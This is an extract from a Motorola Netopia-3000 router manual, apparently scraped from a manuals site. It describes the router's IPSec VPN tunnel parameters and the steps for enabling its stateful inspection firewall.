Motorola Netopia-3000 Router Manual PDF (Setup & Configuration Guide)

Page 136 / 351 Scroll up to view Page 131 - 135

136

Parameter Descriptions

The following tables describe SafeHarbour’s parameters that are used for an IPSec VPN

tunnel conﬁguration:

Table 2: IPSec Configuration page parameters

Field

Description

Name

The Name parameter refers to the name of the conﬁgured tunnel. This is

mainly used as an identiﬁer for the administrator. The Name parameter is

an ASCII value and is limited to 31 characters. The tunnel name does not

need to match the peer gateway

.

Peer External IP

Address

The Peer External IP Address is the public, or routable IP address of the

remote gateway or VPN server you are establishing the tunnel with.

Encryption

Protocol

Encryption protocol for the tunnel session.

Parameter values supported include NONE or ESP.

Authentication

Protocol

Authentication Protocol for IP packet header. The three parameter values

are None, Encapsulating Security Payload (ESP) and Authentication Header

(AH)

Key Management

The Key Management algorithm manages the exchange of security keys in

the IPSec protocol architecture. SafeHarbour supports the standard Inter-

net Key Exchange (IKE)

Table 3: IPSec Tunnel Details page parameters

Field

Description

Name

The Name parameter refers to the name of the conﬁgured tunnel. This is

mainly used as an identiﬁer for the administrator. The Name parameter is

an ASCII value and is limited to 31 characters. The tunnel name does not

need to match the peer gateway

.

Peer Internal

Network

The Peer Internal IP Network is the private, or Local Area Network (LAN)

address of the remote gateway or VPN Server you are communicating with.

Peer Internal

Netmask

The Peer Internal IP Netmask is the subnet mask of the Peer Internal IP

Network.

NAT enable

Turns NAT on or off for this tunnel.

Page 137 / 351

137

Security

PAT Address

If NAT is enabled, this ﬁeld appears. You can specify a Port Address Trans-

lation (PAT) address or leave the default all-zeroes (if Xauth is enabled). If

you leave the default. the address will be requested from the remote router

and dynamically applied to the Gateway.

Negotiation

Method

This parameter refers to the method used during the Phase I key

exchange, or IKE process. SafeHarbour supports Main or Aggressive

Mode. Main mode requires 3 two-way message exchanges while Aggres-

sive mode only requires 3 total message exchanges.

Local ID type

If Aggressive mode is selected as the Negotiation Method, this option

appears. Selection options are: IP Address, Subnet, Hostname, ASCII

Local ID Address/

Value

If Aggressive mode is selected as the Negotiation Method, this ﬁeld

appears. This is the local (Gateway-side) IP address (or Name Value, if Sub-

net or Hostname are selected as the Local ID Type).

Local ID Mask

If Aggressive mode is selected as the Negotiation Method, and Subnet as

the Local ID Type, this ﬁeld appears. This is the local (Gateway-side) sub-

net mask.

Remote ID Type

If Aggressive mode is selected as the Negotiation Method, this option

appears. Selection options are: IP Address, Subnet, Hostname, ASCII.

Remote ID

Address/Value

If Aggressive mode is selected as the Negotiation Method, this ﬁeld

appears. This is the remote (central-ofﬁce-side) IP address (or Name Value,

if Subnet or Hostname are selected as the Local ID Type).

Remote ID Mask

If Aggressive mode is selected as the Negotiation Method, and Subnet as

the Remote ID Type, this ﬁeld appears. This is the remote (central-ofﬁce-

side) subnet mask.

Pre-Shared Key

Type

The Pre-Shared Key Type classiﬁes the Pre-Shared Key. SafeHarbour sup-

ports ASCII or HEX types

Pre-Shared Key

The Pre-Shared Key is a parameter used for authenticating each side. The

value can be ASCII or Hex and a maximum of 64 characters. ASCII is case-

sensitive.

DH Group

Difﬁe-Hellman is a public key algorithm used between two systems to

determine and deliver secret keys used for encryption. Groups 1, 2 and 5

are supported.

PFS Enable

Perfect Forward Secrecy (PFS) is used during SA renegotiation. When PFS

is selected, a Difﬁe-Hellman key exchange is required. If enabled, the PFS

DH group follows the IKE phase 1 DH group.

SA Encrypt Type

SA Encryption Type refers to the symmetric encryption type. This encryp-

tion algorithm will be used to encrypt each data packet. SA Encryption

Type values supported include DES and 3DES.

Table 3: IPSec Tunnel Details page parameters

Page 138 / 351

138

SA Hash Type

SA Hash Type refers to the Authentication Hash algorithm used during SA

negotiation. Values supported include MD5 and SHA1. N/A will display if

NONE is chosen for Auth Protocol.

Invalid SPI

Recovery

Enabling this allows the Gateway to re-establish the tunnel if either the

Netopia Gateway or the peer gateway is rebooted.

Soft MBytes

Setting the Soft MBytes parameter forces the renegotiation of the IPSec

Security Associations (SAs) at the conﬁgured Soft MByte value. The value

can be conﬁgured between 1 and 1,000,000 MB and refers to data trafﬁc

passed. If this value is not achieved, the Hard MBytes parameter is

enforced. This parameter does not need to match the peer gateway

.

Soft Seconds

Setting the Soft Seconds parameter forces the renegotiation of the IPSec

Security Associations (SAs) at the conﬁgured Soft Seconds value. The

value can be conﬁgured between 60 and 1,000,000 seconds. This param-

eter does not need to match the peer gateway

.

Hard MBytes

Setting the Hard MBytes parameter forces the renegotiation of the IPSec

Security Associations (SAs) at the conﬁgured Hard MByte value.

The value can be conﬁgured between 1 and 1,000,000 MB and refers to

data trafﬁc passed. This parameter does not need to match the peer gate-

way

.

Hard Seconds

Setting the Hard Seconds parameter forces the renegotiation of the IPSec

Security Associations (SAs) at the conﬁgured Hard Seconds value. The

value can be conﬁgured between 60 and 1,000,000 seconds This parame-

ter does not need to match the peer gateway

.

IPSec MTU

Some ISPs require a setting of e.g. 1492 (or other value). The default

1500 is the most common and you usually don’t need to change this

unless otherwise instructed. Accepted values are from 100 – 1500.

This is the starting value that is used for the MTU when the IPSec tunnel is

installed. It speciﬁes the maximum IP packet length for the encapsulated

AH or ESP packets sent by the router. The MTU used on the IPSec connec-

tion will be automatically adjusted based on the MTU value in any received

ICMP

can't fragment

error messages that correspond to IPSec trafﬁc initi-

ated from the router. Normally the MTU only requires manual conﬁguration

if the ICMP error messages are blocked or otherwise not received by the

router.

Table 3: IPSec Tunnel Details page parameters

Page 139 / 351

139

Security

Xauth Enable

Extended Authentication (XAuth), an extension to the Internet Key

Exchange (IKE) protocol. The Xauth extension provides dual authentication

for a remote user’s Netopia Gateway to establish a VPN, authorizing net-

work access to the user’s central ofﬁce. IKE establishes the tunnel, and

Xauth authenticates the speciﬁc remote user's Gateway. Since NAT is sup-

ported over the tunnel, the remote user network can have multiple PCs

behind the client Gateway accessing the VPN. By using XAuth, network VPN

managers can centrally control remote user authentication.

Xauth Username/

Password

Xauth authentication credentials.

Table 3: IPSec Tunnel Details page parameters

Page 140 / 351

140

Link:

Stateful Inspection

All computer operating systems are vulnerable to attack from outside sources, typically at

the operating system or Internet Protocol (IP) layers. Stateful Inspection ﬁrewalls intercept

and analyze incoming data packets to determine whether they should be admitted to your

private LAN, based on multiple criteria, or blocked. Stateful inspection improves security by

tracking data packets over a period of time, examining incoming and outgoing packets. Out-

going packets that request speciﬁc types of incoming packets are tracked; only those

incoming packets constituting a proper response are allowed through the ﬁrewall.

Stateful inspection is a security feature that prevents unsolicited inbound access when

NAT is disabled. You can conﬁgure UDP and TCP “no-activity” periods that will also apply to

NAT time-outs if stateful inspection is enabled on the interface. Stateful Inspection param-

eters are active on a WAN interface only if enabled on your Gateway. Stateful inspection

can be enabled on a WAN interface whether NAT is enabled or not.

Stateful Inspection Firewall installation procedure

☛

NOTE:

Installing Stateful Inspection Firewall is mandatory to comply with Required

Services Security Policy - Residential Category module - Version 4.0 (speciﬁed

by ICSA Labs)

For more information please go to the following URL:

http://www

.icsalabs.com/html/comm

unities/ﬁ

re

walls/cer

tiﬁ

cation/

criteria/Residential.pdf

.

1.

Access the router through the web interface from the private LAN.

DHCP server is enabled on the LAN by default.

2.

The Gateway’s Stateful Inspection feature must be enabled in order to

prevent TCP, UDP and ICMP packets destined for the router or the private

hosts.

This can be done by navigating to

Expert Mode

->

Security

->

Stateful Inspection

.

Rate

Popular Motorola Models

Famous Router IPs

Famous Router Companies

Bookmark Our Site

Share